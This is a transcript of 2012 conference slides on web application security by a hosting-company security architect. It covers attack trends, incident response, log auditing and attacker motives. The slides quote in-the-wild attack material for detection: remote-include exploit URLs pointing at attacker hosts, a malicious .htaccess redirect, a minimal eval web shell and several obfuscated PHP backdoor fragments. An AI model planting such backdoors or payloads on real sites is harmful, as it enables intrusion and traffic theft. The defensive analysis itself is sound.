the state of web application security -...
TRANSCRIPT
![Page 1: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/1.jpg)
1
The state of web application security 2012
Robert Rowley
Security Architect
DreamHost
1
![Page 2: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/2.jpg)
Break Down
Attack Trends
Attacker Motivation
Auditing Backdoors
2
![Page 3: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/3.jpg)
Trends
3
![Page 4: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/4.jpg)
Collecting data
Web Application Firewall (mod_security)
Running on 1,000,000+ websites
Centralized logging
4
![Page 5: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/5.jpg)
Trend data sets
26 Million records.
Time frame: August 2011 – Present
5
![Page 6: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/6.jpg)
Attacks!
6
![Page 7: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/7.jpg)
Breaking it down
7
![Page 8: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/8.jpg)
Specific attacks against software
CVE-2009-2254
● E107
– Remote code execution
– ?var=[php]exec();
– Released May 2010 (CVE-2010-2099)
● ZenCart
– SQL injection/execution
– Released May 2009 (CVE-2009-2254)
8
![Page 9: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/9.jpg)
E107 ZenCart
9
![Page 10: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/10.jpg)
timthumb
● Allows arbitrary file upload
● Including fully functional php files
● Popular wordpress theme component
● (not part of wordpress core, or plugins)
● Released August 2011 (CVE-2011-4106)
10
![Page 11: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/11.jpg)
E107 ZenCart
11
![Page 12: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/12.jpg)
timthumb
12
![Page 13: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/13.jpg)
Puberty
Maturity
Life-cycle of an exploit
13
![Page 14: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/14.jpg)
Theory about this trend...
Attacks are automated. – Lead time for attack code update.
Successful compromise adds a new node. – This creates fluctuations in growth.
14
![Page 15: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/15.jpg)
PHP-CGI remote code execution
● Arbitrary code execution
● Source code disclosure
● Denial of service
● Released May 2012 (CVE-2012-1823)
● Our staff was notified
● We rolled out a virtual patch before the 0day was released.
15
![Page 16: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/16.jpg)
E107 ZenCart timthumb
16
![Page 17: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/17.jpg)
0-D ay
PHP-CGI
17
![Page 18: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/18.jpg)
PHP-CGI
Puberty
18
![Page 19: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/19.jpg)
Attack Response
Notify the ISP's abuse desk
90 ISPs notified each day
Most are non-responsive to the report.
19
![Page 20: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/20.jpg)
Attack sources
Home/Business ISP (20%)
Hosting/Datacenter (80%)
20
![Page 21: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/21.jpg)
A little about incident response
21
![Page 22: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/22.jpg)
Response breakdown
Immediate mitigation
Put out the fire
Monitor
Review
Long term fixes
Correct business policy
Secure code and/or configurations
Etc...
22
![Page 23: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/23.jpg)
Standard approach
Monitoring
Vulnerability released,
Incident
Assessment,
Incident Response
Evaluation,
Update
23
![Page 24: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/24.jpg)
Better approach
Monitoring
Vulnerability released,
Incident
Assessment,
Incident Response
Evaluation,
Update
24
![Page 25: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/25.jpg)
Auditing nitty gritty
File monitoring (you do this right?)
Logs (correlate timestamps)
Logs (sort by request!)
No logs? Malware detection by hand
25
![Page 26: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/26.jpg)
FileSystem Monitoring
Part of your backups.
Just use rsync
Inotify (kernel level)
Tripwire (daemon/service)
DIY
26
![Page 27: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/27.jpg)
Digging in with timestamps.
$ ls -la omgfire.com/backdoor.php
-rw-rw-r-- 1 user grp 0 Feb 13 21:52 omgfire.com/backdoor.php
$ grep 21:52: logs/omgfire.com/access.log.2012-02-13
123.125.71.31 - - [13/Feb/2012:21:52:53 -0800]
"POST /wp-content/plugins/hello.php HTTP/1.1" 200 158 "-" "Mozilla"
27
![Page 28: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/28.jpg)
Digging in with HTTP logs $ awk '{print $7}' access.log | sort | uniq -c | sort -n
28
![Page 29: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/29.jpg)
$ awk '{print $7}' access.log | sort | uniq -c | sort -n
1 /phpMyAdmin-2.2.3/index.php
1 /phpMyAdmin-2.5.5-pl1/index.php
1 /phpMyAdmin-2.5.5/index.php
1 /phpMyAdmin-2.5.6-rc2/index.php
1 /phpMyAdmin/index.php
1 /pma/index.php
1 /web/phpMyAdmin/index.php
1 /websql/index.php
2 /phpmyadmin/index.php
4 /robots.txt
242 /
Digging in with HTTP logs
29
![Page 30: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/30.jpg)
No success?
Lets get into some backdoor auditing
These backdoors were found in the wild
Show you what to look for
Learn more about the attacker's methods
30
![Page 31: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/31.jpg)
Using find to find
● Use “find” on any linux/unix server
find /www/path -exec grep “$fingerprint”
● Use generic fingerprints of commands that execute code.
– eval, preg_replace, exec, assert, etc...
● Use fingerprints of known backdoors
31
![Page 32: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/32.jpg)
Using find to cleanup
● find /www/path -exec grep “$fingerprint” {} \;
● find /www/path -exec grep “$fingerprint” {} \; -exec chmod 0 {} \;
● find /www/path -exec grep “$fingerprint” {} \; -exec sed “s/$fingerprint//” {} \;
32
![Page 33: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/33.jpg)
Attacker Motivation
?
33
![Page 34: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/34.jpg)
Attacker Motivation
$
34
![Page 35: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/35.jpg)
Find an exploit? Do the right thing.
Bounty programs (facebook, google, paypal)
Responsible disclosure
Don't become a criminal
35
![Page 36: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/36.jpg)
0-day to Pay-day
Install backdoors
Sell access to backdoors on the black market
Phishing
Spam
BlackHat SEO
Traffic Theft
Install more backdoors
36
![Page 37: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/37.jpg)
Payday
Phishing
Identity/Password theft
http://site/some_dir/www.bankingsite.com/
37
![Page 38: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/38.jpg)
Payday
Spam
Everyone knows this already
38
![Page 39: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/39.jpg)
Payday
BlackHat SEO
Hidden links injected on site
Redirect visitors
39
![Page 40: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/40.jpg)
Payday
Traffic Theft
Javascript/Iframe/other
Redirect site traffic to malicious pages (malware installs)
Flashback trojan
40
![Page 41: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/41.jpg)
Payday
Install more backdoors on the site
Why not?
Backdoor on backdoor action
41
![Page 42: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/42.jpg)
Little more on traffic theft.
Q1 2012 we noticed an influx of these
Actions were taken, data was recorded
42
![Page 43: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/43.jpg)
Example .htaccess infection:
ErrorDocument 404 http://congatarcxisi.ru/
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|...
RewriteRule ^(.*)$ http://congatarcxisi.ru/ [R=301,L]
43
![Page 44: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/44.jpg)
Collection
Pulled the remote site from any .htaccess similar to the previous example.
1000 unique domains found
Let's break it down
44
![Page 45: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/45.jpg)
SiteCheck report
Safe ( 2%)
Low Risk (29%)
Malicious (31%)
Unknown (38%)
45
![Page 46: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/46.jpg)
TLD
.ru (64%)
.com (14%)
.info ( 8%)
.in ( 8%)
.org ( 3%)
.net ( 2%)
other ( 1%)
46
![Page 47: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/47.jpg)
Registrars
Reg.ru (50%)
Directi (18%)
Other (18%)
GoDaddy (13%)
47
![Page 48: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/48.jpg)
IP address
other (33%)
208.87.35.103 (22%)
94.63.149.246 (10%)
208.73.210.29 ( 9%)
69.43.161.154 ( 5%)
221.132.34.163 ( 5%)
95.211.131.185 ( 4%)
74.117.116.96 ( 4%)
94.63.149.247 ( 2%)
79.137.226.90 ( 2%)
69.165.98.21 ( 2%)
194.28.114.102 ( 2%)
48
![Page 49: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/49.jpg)
Backdoor evolution
Plaintext
Base64 decode
Preg_replace
and beyond!!!
49
![Page 50: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/50.jpg)
Collection
● Compromised sites
● Attack logs
50
![Page 51: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/51.jpg)
Getting backdoors from attack logs timthumb.php
● Example malicious URL …/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php
● Download Backdoor curl http://flickr.com.bpmohio.com/bad.php
● Review/Categorize/Report
o--=[ r57 PHP Shell ]=--o
$version = “2009”;
51
![Page 52: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/52.jpg)
Getting backdoors from attack logs PHP-CGI
● Example malicious URL /?-d...auto_prepend_file=http://64.109.183.21/bin/acesso.txt
● Download Backdoor wget http://64.109.183.21/bin/acesso.txt
● Review/Categorize/Report
r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru
version = “1.666”;
52
![Page 53: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/53.jpg)
Dead Simple
<?php
eval($_POST['payload']);
?>
53
![Page 54: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/54.jpg)
Some Authentication
if(md5($_COOKIE['be80d91eb9db4ffa'])
== "e8fa67e99b7e07e9e699f8c3d1dbb43d" )
{
eval($_POST['payload']);
exit;
}
54
![Page 55: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/55.jpg)
Well Documented #####cfg#####
# use password true / false #
$create_password = true;
$password = "mugus"; // default password
# UNIX COMMANDS
# description (nst) command
# example: Shutdown (nst) shutdown -h now
######ver####
$ver= "v2.1";
#############
$pass=$_POST['pass'];
if($pass==$password){ ...
55
![Page 56: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/56.jpg)
Base64 decode
eval(base64_decode('JGF1dGhfcGFzcyA9IC...
56
![Page 57: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/57.jpg)
Base64 decode
eval(base64_decode('JGF1dGhfcGFzcyA9IC...
My favorite way to handle them:
sed s/eval/print/g < inputfile > outputfile
print(base64_decode('JGF1dGhfcGFzcyA9IC...
PHP parser outputs:
$auth_pass = "35a93487bc9204c...
57
![Page 58: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/58.jpg)
GZinflate
<?
error_reporting(0);
echo "ok!";
$code = "xZbNYaMwFFP3lfoO7JJHwnXa … “;
@eval(gzinflate(base64_decode($code)));
?>
58
![Page 59: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/59.jpg)
Gold star for trying ...
eval(gzinflate(str_rot13(base64_decode('FJ3FjsNculJfpXT9WB6YVnfdltmJmW ...
59
![Page 60: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/60.jpg)
Regex revenge
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67...
60
![Page 61: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/61.jpg)
Regex revenge
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67...
65 = e
76 = v
61 = a
6C = l
28 = (
61
![Page 62: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/62.jpg)
Variables as functions
$HixNlV='as';$eQovrf='e';$xsEWcg=$HixNlV.'s'.$eQovrf.'r'.'t';$HtJYXB='b'.$HixNlV.$eQovrf.(64).'_'.'d'.$eQovrf.'c'.'o'.'d'.$eQovrf;
@$xsEWcg(@$HtJYXB('ZXZhbChnemluZm...
62
![Page 63: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/63.jpg)
Variables as functions
$HixNlV='as';$eQovrf='e';$xsEWcg=$HixNlV.'s'.$eQovrf.'r'.'t';$HtJYXB='b'.$HixNlV.$eQovrf.(64).'_'.'d'.$eQovrf.'c'.'o'.'d'.$eQovrf;
@$xsEWcg(@$HtJYXB('ZXZhbChnemluZm...
assert(base64_decode('ZXZhbChnemluZm...
63
![Page 64: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/64.jpg)
Uhm what...
$FR='sFwFLOzO'|~OU;
$cYqFBi=r7bSCQ&'J|Ok@V';
$z3X0fdta1Nz="c>_"&'Q7[';
$kg6i=#qfapJag'.']/=nX/'^'8'.KyK6.'{';
$iZBTF=lsrc.'<'.Smef&srzI.':'.VmqH;
64
![Page 65: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/65.jpg)
Itty Bitty Bitwise Operators
$FR='sFwFLOzO'|~OU;
$cYqFBi=r7bSCQ&'J|Ok@V';
$z3X0fdta1Nz="c>_"&'Q7[';
$kg6i=#qfapJag'.']/=nX/'^'8'.KyK6.'{';
$iZBTF=lsrc.'<'.Smef&srzI.':'.VmqH;
65
![Page 66: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/66.jpg)
Backdoor Conclusions
Attackers are evolving their code
Fingerprinting can be untrustworthy
Monitor your filesystem
66
![Page 67: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/67.jpg)
Thank you
Trustwave (mod_security)
DreamHost & DreamHost customers
White hat security researchers
OWASP
Security BSides
HITcon
67
![Page 68: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/68.jpg)
Further Reading
Mikko Hypponen (TED talks)
http://blog.spiderlabs.com
http://blog.dreamhost.com/category/security
Want to follow up?
Email: [email protected]
Twitter: @iamlei
68